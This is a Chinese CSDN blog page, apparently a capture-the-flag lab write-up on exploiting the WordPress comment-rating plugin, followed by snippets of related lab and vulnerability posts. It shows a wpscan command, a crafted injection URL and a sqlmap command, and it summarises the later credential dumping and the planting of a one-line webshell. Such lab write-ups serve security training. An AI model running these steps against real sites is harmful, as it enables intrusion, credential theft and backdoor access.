墨者学院 - WordPress插件漏洞分析溯源

最新推荐文章于 2024-08-16 12:12:16 发布
最新推荐文章于 2024-08-16 12:12:16 发布
阅读量2.2k 收藏
点赞数
分类专栏: sql Mozhe webshell kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42357070/article/details/82218825
版权
本文详细记录了对WordPress网站进行安全检测的过程,首先利用wpscan扫描插件漏洞,然后针对找到的问题插件`comment-rating`,通过sqlmap进行数据库交互,枚举数据库、表格和字段,成功获取账号密码并进行MD5解密。接着,登录WordPress后台,编辑插件添加一句话木马,并利用菜刀进行进一步的控制。
摘要由CSDN通过智能技术生成

使用wpscan扫面wordpress有漏洞的插件

wpscan --url  "ip" --enumerate vp

 


查找插件漏洞
http://www.bkjia.com/xtaq/783717.html


构造链接

http://ip/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a

 

sqlmap -u "http://ip/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a" --dbs
查数据库

最低0.47元/天 解锁文章
多崎巡礼
关注
专栏目录
WordPress插件漏洞分析溯源
qq_36933272的博客
09-03 582
打开wpscan扫描,输入wpscan --url http://219.153.49.228:48780 --enumerate vp,这是扫描wordpress存在漏洞插件 发现出现漏洞插件 [1566903968447592.png] 打开连接,查找到注入点define(‘URL’,$url[‘path’].‘wp-content/plugins/comment-rating/ck-pro...
墨者学院-投票常见漏洞分析溯源
Ruoten的博客
01-01 3465
1.进入靶场,任务要求是需要我们投票,把a2019的票数成为第一,就是所谓的刷票,完成后,就会获得key值 2.然后打开BurpSuite打开响应包拦截,当我们点击投票按钮,BurpSuite就会拦截到一个响应包 3.点击鼠标右键点击"send to Intruder",然后把响应包的内容进行修改,修改User-Agent的头数据为"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom.
墨者WordPress插件漏洞分析溯源
wswr的博客
03-18 1159
总结:整个流程就算发现这是wordpress然后用专门的wpscan去扫漏洞,然后发现的了插件漏洞,然后利用整个插件漏洞来植入后门,然后获取key文件 思路:尝试绕过登录,进入页面发现不行,然后面向搜索引擎学习,看别人的做法 这个老哥的做法和流程应该是没问题,只是到了那个要翻墙的环节我应该就不行了 WordPress插件SQL注入漏洞——漏洞复现_W小哥1的博客-CSDN博客_wordpress注入漏洞 于是我又看了这个老哥 墨者学院 - WordPress插件漏洞分析溯源_多崎巡礼的博客-CSD
Wordpress漏洞
最新发布
weixin_44737168的博客
08-16 666
WordPress的文件管理器插件(wp-file-manager)6.9版本之前存在CVE-2020-25213 漏洞,该漏洞允许远程攻击者上传和执行任意PHP代码。WPScan是Kali Linux默认自带针对wordpress的一款扫描神器。
Wordpress 插件出现漏洞,网站可能被攻击者接管
cpongo5
02-13 251
开发四年只会写业务代码,分布式高并发都不会还做程序员? >>> 据安全研究人员警告,因旧版 Word...
墨者靶场 WordPress插件漏洞分析溯源
永远是少年
12-30 1564
今天继续给大家介绍CTF刷题,本文主要内容墨者靶场 WordPress插件漏洞分析溯源。 一、题目简介 二、解题实战
360众测靶场题库之85- WordPress插件漏洞分析溯源,2024年最新5分钟搞定
2401_83974087的博客
04-13 390
字段爆出来之后,便可以利用用户名和密码登录WordPress后台。看到插件一栏,点击修改comment-rating插件的PHP源文件,需要注意,修改的源文件最好是已启用的,添加一句话木马:,下一步就是菜刀连了。
墨者学院 - CMS系统漏洞分析溯源(第5题)
多崎巡礼的博客
10-29 1624
phpecms1.3 cookies欺骗漏洞进后台 phpecms1.3/admin/cms_check.php <?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?>   判断如果没有admin_na...
墨者学院-编辑器漏洞分析溯源(第2题)
JimWu的博客
09-05 417
编辑器漏洞分析溯源(第2题) 难易程度:★★ 题目类型:编辑器漏洞 使用工具:IE、菜刀、win2003 1.打开靶场 首先要了解ewebeditor的基本特征: 默认登陆admin_login.asp 默认数据库db/ewebeditor.mdb 2.在url中输入数据库,下载文件,就能得到登录的用户名和密码。 但是用户名经过了md5加密,需要通过网上来解密,得到用户名和密码。 3.登录...
墨者学院-编辑器漏洞分析溯源(第3题)
JimWu的博客
09-05 544
编辑器漏洞分析溯源(第3题) 难易程度:★★★ 题目类型:编辑器漏洞 使用工具:FireFox浏览器、burpsuite、菜刀 1.打开靶场,首先了解DotNetTextBox编辑器的基本特征。 默认的上传路径为:/system_dntb/uploadimg.aspx 2.打开后,发现是不允许上传的。 试图在F12情况下,将disabled修改enabled,虽然能上传,但会报错。 3.利用Do...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 1435
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
漏洞wordpress插件from exploit-db
04-08
备份一下
wordpress 漏洞_WordPress漏洞分析
weixin_42514783的博客
01-26 5458
根据CVE官方漏洞通报得知wordpress新出一个组合式rce漏洞漏洞编号分别为CVE-2019-8943和CVE-2019-8942,下载漏洞版本源码,分析漏洞触发过程,注:漏洞复现时一定要断网搭建,wordpress在联网状态时会自动更新代码包。找到漏洞发生文件 post.php,wordpress有多个post.php文件,这里简要说明一下各自的作用,wp-includes/post.p...
WordPress 插件 Simple Ajax Chat 信息泄露漏洞(CVE-2022-27849)
xiaobai_20190815的博客
04-27 2708
一、漏洞描述 WordPressWordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件WordPress 插件 Simple Ajax Chat 20220115及其之前版本存在信息泄露漏洞,目前尚无此漏洞的相关信息,请随时关注CNNVD或厂商公告 二、影响版本 WordPress 插件 Simple Ajax Chat 2
最新WordPress插件漏洞,影响超过700万个网站
w3cschools的博客
03-18 540
研究人员已经披露了多个WordPress插件中的漏洞,如果成功利用这些漏洞,则攻击者可以在某些情况下运行任意代码并接管网站。 这些缺陷已在Elementor(一个用于超过700万个网站的网站构建器插件)和WP Super Cache(用于服务WordPress网站的缓存页面的工具)中发现。 据国际知名白帽黑客、东方联盟创始人郭盛华透露:该错误与一组存储的跨站点脚本(XSS)漏洞(CVSS评分:6.4)有关,该漏洞是在将恶意脚本直接注入易受攻击的Web应用程序时发生的。 在这种情况下,由于在服务器端
WordPress 热门插件中存在漏洞,200多万网站受影响
smellycat000的专栏
05-08 837
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士WordPress 热门插件 Advanced Custom Fields 中存在一个漏洞,用户需升级至版本 6.1.6。该漏洞的编号是CVE-2023-30777。该漏洞是反射型XSS,可滥用于将任意可执行文件脚本注入非恶意网站。该插件同时拥有免费和专业版本,安装量超过200万次。2023年5月,插件维护人员收到漏洞通知。研究员 Rafie M...
漏洞情报 | WordPress ProfilePress插件多个严重漏洞
爱国小白帽
07-07 1232
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 WordPress ProfilePress(原 WP User Avatar)是一个轻量级会员插件,可用于创建用户画像、会员目录和用于用户注册、登录、密码重置及用户信息编辑的前端表单。 360漏洞云监测到WordPress ProfilePress插件存在多个严重漏洞。 CVE-2021-34621 特权提升漏洞 在用户注册过程中,攻击者可通过提供任意用户元数据实现权限提升。 CVE-2021-34622 特权提升漏洞 在用户画
墨者学院-WordPress 远程命令执行漏洞(CVE-2018-15877)复现
JimWu的博客
09-05 1298
WordPress 远程命令执行漏洞(CVE-2018-15877)复现 难易程度:★★ 题目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite 1.打开靶场,找到登录,点击进去。 2.尝试弱口令登录,都失败了,知道账号为admin。 没有验证码,打开burpsuite,尝试暴力破解。 3.得到密码为123qwe。 4.该漏洞为Activity Monitor插件远程命令执行漏...
WordPress文件管理器插件0day漏洞解析-CVE-2020-25213
ordar123的博客
09-16 2287
WordPress文件管理器插件0day漏洞解析 昨天好多安全平台发布了WordPress插件WP File Manager的0day漏洞预警,然后我怀着好奇的心情解析了一波,花了些时间总算是解开了这个漏洞的神秘面纱。 从预警中可以看到漏洞在/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php,然后里面的 关键代码说实话我一开始没看懂,大概意思就是两个文件包含,然后下面run elFinder。 为了弄懂这个我下载了WP Fil
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值